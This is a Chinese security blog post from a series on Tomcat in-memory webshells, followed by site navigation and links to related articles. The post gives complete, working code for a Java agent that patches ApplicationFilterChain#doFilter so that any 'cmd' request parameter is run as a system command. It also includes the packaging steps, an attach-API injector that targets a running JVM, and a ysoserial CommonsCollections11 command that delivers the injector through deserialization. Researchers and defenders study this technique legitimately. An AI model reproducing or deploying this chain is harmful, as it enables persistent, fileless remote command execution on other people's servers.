Tomcat内存马学习5:Agent型

最新推荐文章于 2024-04-07 09:30:45 发布
最新推荐文章于 2024-04-07 09:30:45 发布
阅读量491 收藏 1
点赞数
分类专栏: Java安全 文章标签: tomcat java web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43263451/article/details/126260716
版权

利用java-agent修改jvm中已经加载的类比如(org/apache/catalina/core/ApplicationFilterChain#doFilter)来达到注入内存马的目的

具体点来说就是通过VirtualMachine 类的 attach(pid) 方法,可以连接到一个运行中的 java 进程上之后便可以通过 loadAgent(agentJarPath) 来将恶意agent 的 jar 包注入到对应的进程,然后对应的进程会调用agentmain方法,这个方法会遍历所有的已加载类并找到我们需要的类,修改其字节码从而达到注入内存马目的

agent.jar(需要上传到对方服务器)

//AgentMain
import java.lang.instrument.Instrumentation;

public class AgentMain {

    public static final String ClassName = "org.apache.catalina.core.ApplicationFilterChain";

    public static void agentmain(String agentArgs, Instrumentation ins) {
        ins.addTransformer(new DefineTransformer(),true);
        // 获取所有已加载的类
        Class[] classes = ins.getAllLoadedClasses();
        for (Class clas:classes){
            if (clas.getName().equals(ClassName)){
                try{
                    // 找到ClassName类,对其重新定义,此时会调用DefineTransformer#transform
                    ins.retransformClasses(new Class[]{clas});
                } catch (Exception e){
                    e.printStackTrace();
                }
            }
        }
    }
}

//DefineTransformer
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtMethod;

import java.lang.instrument.ClassFileTransformer;
import java.lang.instrument.IllegalClassFormatException;
import java.security.ProtectionDomain;

// 每当类被加载,就会调用 transform 函数
public class DefineTransformer implements ClassFileTransformer {

    public static final String ClassName = "org.apache.catalina.core.ApplicationFilterChain";

    public byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) throws IllegalClassFormatException {
        //给ApplicationFilterChain#doFilter方法体最前面添加内存马代码
        className = className.replace("/",".");
        if (className.equals(ClassName)){
            System.out.println("Find the Inject Class: " + ClassName);
            ClassPool pool = ClassPool.getDefault();
            try {
                CtClass c = pool.getCtClass(className);
                CtMethod m = c.getDeclaredMethod("doFilter");
                m.insertBefore("javax.servlet.http.HttpServletRequest req =  request;\n" +
                        "javax.servlet.http.HttpServletResponse res = response;\n" +
                        "java.lang.String cmd = request.getParameter(\"cmd\");\n" +
                        "if (cmd != null){\n" +
                        "    try {\n" +
                        "        java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();\n" +
                        "        java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(in));\n" +
                        "        String line;\n" +
                        "        StringBuilder sb = new StringBuilder(\"\");\n" +
                        "        while ((line=reader.readLine()) != null){\n" +
                        "            sb.append(line).append(\"\\n\");\n" +
                        "        }\n" +
                        "        response.getOutputStream().print(sb.toString());\n" +
                        "        response.getOutputStream().flush();\n" +
                        "        response.getOutputStream().close();\n" +
                        "    } catch (Exception e){\n" +
                        "        e.printStackTrace();\n" +
                        "    }\n" +
                        "}");
                byte[] bytes = c.toBytecode();
                // 将 c 从 classpool 中删除以释放内存
                c.detach();
                return bytes;
            } catch (Exception e){
                e.printStackTrace();
            }
        }
        return new byte[0];
    }
}

//MANIFEST.MF
Manifest-Version: 1.0
Created-By: 1.8.0_332 (Amazon.com Inc.)
Can-Redefine-Classes: true
Can-Retransform-Classes: true
// 设置入口类
Agent-Class: AgentMain

以上三个文件打包为jar

jar cvfm AgentMain.jar MANIFEST.MF AgentMain.class DefineTransformer.class

利用CC11注入agent.jar

//保存为TestAgentMain.java
try{
    //设置上传的agent.jar的位置
    java.lang.String path = "F:\\javasec-env\\javaAgent\\src\\main\\java\\agent.jar";
    //加载tools.jar,这个虽然是jdk内置jar包,但是默认不加载,需要人工导入
    java.io.File toolsPath = new java.io.File(System.getProperty("java.home").replace("jre","lib") + java.io.File.separator + "tools.jar");
    java.net.URL url = toolsPath.toURI().toURL();
    java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[]{url});
    //加载tools包内的VirtualMachine和VirtualMachineDescriptor用于寻找springboot项目的JVM进程
    Class/*<?>*/ MyVirtualMachine = classLoader.loadClass("com.sun.tools.attach.VirtualMachine");
    Class/*<?>*/ MyVirtualMachineDescriptor = classLoader.loadClass("com.sun.tools.attach.VirtualMachineDescriptor");
    java.lang.reflect.Method listMethod = MyVirtualMachine.getDeclaredMethod("list",null);
    java.util.List/*<Object>*/ list = (java.util.List/*<Object>*/) listMethod.invoke(MyVirtualMachine,null);

    System.out.println("Running JVM list ...");
    for(int i=0;i<list.size();i++){
        Object o = list.get(i);
        java.lang.reflect.Method displayName = MyVirtualMachineDescriptor.getDeclaredMethod("displayName",null);
        java.lang.String name = (java.lang.String) displayName.invoke(o,null);
        // 列出当前有哪些 JVM 进程在运行 
      	// 这里的 if 条件根据实际情况进行更改
        // com.example.CcApplication为我本地springboot项目的入口类
        if (name.contains("com.example.CcApplication")){
            // 在获取到spring项目的JVM 进程后
            // 获取对应进程的 pid 号
            java.lang.reflect.Method getId = MyVirtualMachineDescriptor.getDeclaredMethod("id",null);
            java.lang.String id = (java.lang.String) getId.invoke(o,null);
            System.out.println("id >>> " + id);
            //连接到对应JVM 进程
            java.lang.reflect.Method attach = MyVirtualMachine.getDeclaredMethod("attach",new Class[]{java.lang.String.class});
            java.lang.Object vm = attach.invoke(o,new Object[]{id});
            //将agent.jar注入到该进程中,此时会调用jar包中的agentmain方法,搜索已加载的ApplicationFilter类并修改其doFilter方法
            java.lang.reflect.Method loadAgent = MyVirtualMachine.getDeclaredMethod("loadAgent",new Class[]{java.lang.String.class});
            loadAgent.invoke(vm,new Object[]{path});
            // 释放该进程
            java.lang.reflect.Method detach = MyVirtualMachine.getDeclaredMethod("detach",null);
            detach.invoke(vm,null);
            System.out.println("Agent.jar Inject Success !!");
            break;
        }
    }
} catch (Exception e){
    e.printStackTrace();
}

//将TestAgentMain.java添加到cc11上来触发
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections11 codefile:./TestAgentMain.java > cc11demo.ser

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IbVdNdMl-1660096704602)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220809143739336.png)]

成功注入

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IWGDPeOt-1660096704603)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220809143749978.png)]

大体思路都写在了代码注释里

感谢木头师傅以及Y4er师傅的指点

浔阳江头夜送客丶
关注
专栏目录
Java Tomcat内存——filter内存
m0_61506558的博客
11-17 656
至此,invoke()部分的所有流程我们都分析完毕了,接着继续往上看,也就是doFilter()方法。这个doFilter()方法也是由最近的那个invoke()方法调用的。如图,我们把断点下过去。如果师傅们这个invoke()方法可用的话,可以断点下这里,如果不可用的话可以下到后面doFilter()方法。这里我们要重点关注前文说过的这个变量,那它是什么呢?我们跟进这个方法。使用创建了一个过滤链,将进行传递。我们在方法走一下流程。
Tomcat内存学习(一)Filter
Vicl1fe的博客
08-22 363
前言 想研究内存还是得学习这方面的知识。对于Tomcat容器的详解参考:https://blog.csdn.net/sunyunjie361/article/details/58588033 Tomca结构 Tomcat总体结构如下。 Server –> Service –> Connector & Container( Engine –> Host –> Context( Wrapper( Servlet ) ) ) 下面这个图是我对Tomcat的理解。如有错误请指
java agent 监控tomcat_promethues监控tomcat
weixin_39860064的博客
02-26 159
promethues监控tomcat:mkdir /var/lib/tomcat7/prometheuscp -rv jmx_prometheus_javaagent-0.3.1.jar /var/lib/tomcat7/prometheus/cp -rv config.xml /var/lib/tomcat7/prometheus/chown tomcat7:tomcat7 /var/lib/t...
java agent 监控tomcat_Promethues如何监控Tomcat
weixin_39823017的博客
02-26 469
Promethues 监控tomcat 主要用的模块Promethus 负载抓取/存储指标信息、并提供查询功能grafana 数据可视化JMX exporter 提供JMX中JVM相关的metrics1、利用JMX exporter,在Java进程内启动一个小的Http server 2、配置Prometheus抓取那个Http server提供的metrics。3、配置Grafana连接Pro...
java agent部署到tomcat
qq_33192454的博客
10-12 1460
Java Agent 是一个 Java 应用程序,它可以通过 Java Instrumentation API 来修改或监视正在运行的 Java 应用程序的字节码。根据您的 Java Agent 的具体功能,可以在运行中的应用程序中验证其是否正常工作。要在 Tomcat 启动时加载 Java Agent,您需要在 Tomcat 启动脚本中配置 Java Agent。将您的 Java Agent 代码打包成一个 Jar 文件,其中包含了代理程序的实现和 Manifest 文件,以指定代理程序的入口。
skywalking源码分析第二十篇一agent端实战之tomcat插件
小麒麟的博客
03-10 836
定义插件 拦截StandardHost的的请求处理valve: StandardHostValve,invoke方法 此外还拦截异常处理方法[本文不做介绍] public class TomcatInstrumentation extends ClassInstanceMethodsEnhancePluginDefine { private static final String ENHANCE_CLASS = "org.apache.catalina.core.StandardHostValv
windows下Tomcat设置自启后agent启动参数的设定
zhu1361的专栏
06-14 697
在此处我们明显可以看到参数的设定,和运行tomcat8w.exe中参数设置是相同的,那么我们在此处增加自己的启动参数即可。在通过startup.bat 启动时我们一般会在catalina.bat中设定一些启动参数,但是在tomcat增加服务器后启动项为tomcat8.exe时,这些参数就会失效,那么该如何处理呢?一定不要忘记,我这块javaagent的key value中间是需要用冒号:进行分割,这个根据你自身需要,符号出现问题的话服务也将启动失败。
shiro 内存_Tomcat 内存检测
weixin_39637921的博客
12-22 1529
随着HW、攻防对抗的强度越来越高,各大厂商对于webshell的检测技术愈发成熟,对于攻击方来说,传统的文件落地webshell的生存空间越来越小,无文件webshell已经逐步成为新的研究趋势。三月底针对tomcat内存的检测写了一个demo,但由于对Maven打包理解不深,整个项目结构比较糟糕。国庆前偶然发现LandGrey师傅的copagent项目,在该项目基础上进行了重构,并于本文中记录...
Java Agent内存复现及清理
vlogFeynman的博客
05-07 2878
Java Agent内存复现及清理 本文是对互联网上内存相关资源学习整理的笔记记录,参考文章如下 利用“进程注入”实现无文件复活 WebShell 基于javaAgent内存检测查杀指南 0x01 内存简介 ########### 0x02 java agent内存 这里记录 memshell 的复现 准备条件:1. Tomcat环境 2. inject.jar agent.jar 访问web应用,输入url ,服务端返回正常结果 将inject.jar ag..
内存介绍及分析-带查杀工具tomcat memshell scanner.jsp
weixin_65629944的博客
12-18 1091
先判断是通过什么方法注入的内存,可以先查看web日志是否有可疑的web访问日志,如果是filter或者listener类就会有大量url请求路径相同参数不同的,或者页面不存在但是返回200的,查看是否有类似哥斯拉、冰蝎相同的url请求,哥斯拉和冰蝎的内存注入流量特征与普通webshell的流量特征基本吻合。4.java VisualVM工具:是一款免费的,集成了多个 JDK 命令行工具的可视化工具,它能为您提供强大的分析能力,对 Java 应用程序做性能分析和调优。cmd=后跟命令即可。
tomcat进程注入
bring_coco的博客
06-27 962
可以看到agent.jar文件为了防止发现,自动清除,而且重启电脑之后,内存不死,继续可以使用。将agent.jar和inject.jar放到tomcta的web目录下。跟随上一篇《java进程注入》这里使用memShell。那么memShell分析。
josso agent配置以及Eclipse中的Tomcat Server连接远程Josso
ljk12111217的博客
05-10 245
公司采用Josso作为各个应用的统一登录接口,目前已经集成多个系统。将Josso和应用分别放在不同的Tomcat Server上并实现通讯。这样开发人员就只需要跑本地应用,应用连接远程服务器上的josso服务进行登录认证,节省了开发流程和开发时间。 本文假设服务器的josso gateway已经正确配置,下面讲述如何在本地配置agent。 下载josso http://w...
探索JavaAgent-Tomcat-MemShell:一款强大的监控与诊断工具
最新发布
gitblog_00046的博客
04-07 423
探索JavaAgent-Tomcat-MemShell:一款强大的监控与诊断工具 去发现同类优质开源项目:https://gitcode.com/ 在Java世界中,对于复杂应用的监控和性能优化,JavaAgent往往扮演着至关重要的角色。就是这样一款独特的开源项目,它通过JVM内存级别的操作,提供了实时查看和修改Tomcat内部状态的能力,帮助开发者高效地调试和诊断问题。 项目简介 JavaAg...
skywalking监控tomcat agent大量报错日志分析
u010282135的专栏
01-17 5987
skywalking功能就不多说了,说多了我也不知道.... 在tomcat中加入agent路径后,agent/logs下面skywalking-api.log 多了很多的错误日志,两天就把磁盘撑爆了看日志如下 ...
【性能监控:jvm+cpu+目标field】自定义类加载器+Java agent+反射实现对tomcat的零侵入式服务监控
haohaoxuexiyai的博客
03-05 735
前言 最近项目中有一个需求,需要临时监控一下一个部署在tomcat中的服务的jvm性能和cpu性能,这个服务中有一个内存队列queue,存储的是消费kafka后的数据,也需要对其进行大小的监控,来判断是否存在消息积压,从而判断是否需要进行性能的调优或者扩服务。 市面上已经有很多成熟的大项目的监控方案了:例如可以用prometheus或者arthas来实现各种可定制的监控方案,我会在后面抽空补充下这些常用的开源监控组件的使用方案,但是这些方案都有个很明显的问题,就是部署起来太重,而我现在只需要快速且轻量的临
十三、Java Agent
L_D_Y_K的博客
08-24 2122
java agent attach机制
Linux环境下配置Tomcat以及JAVA
qq_41331645的博客
10-23 6619
作为JAVA程序员,Linux系统是必须要了解的,其实linux系统跟windows系统的区别就是一个是指令的系统,另一个是图形化界面,两者有所不同,今天自己尝试了一下在linux环境下配置tomcat以及jdk,有点耗费时间,可能是因为初次接触指令代码,下面我就来总结一下 配置Tomcat:        首先使用wget指令,指令后面跟上tomcat的url,linux会根据这个地址自己去...
【漏洞复现-Tomacat-文件上传】vulfocus/tomcat-cve_2017_12615
10-09 1404
【Tomacat-文件上传】
今天搞定个javaagent类加载和tomcat冲突问题
只作为个人备忘录
07-14 6321
premainmain默认是appclassloader,但是tomcat加载catalina是urlclassloader,由于是双亲委托机制,父类appclassloader不能访问子类urlclassloader,所以会报错not found 所以大神你之前加上了appclassloader加载tomcat的jar包,导致后来tomcat类加载器先找到父类appclassloader加载
Tomcat内存溢出解决方案:三大问题与对策解析
"本文主要探讨了Tomcat内存溢出的三种常见情况,并提供了相应的解决办法。内存溢出问题通常是由于Java堆、永久代空间或创建新线程时内存不足所导致。针对这些问题,我们需要合理设置Tomcat服务器的JVM参数,如-Xms、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值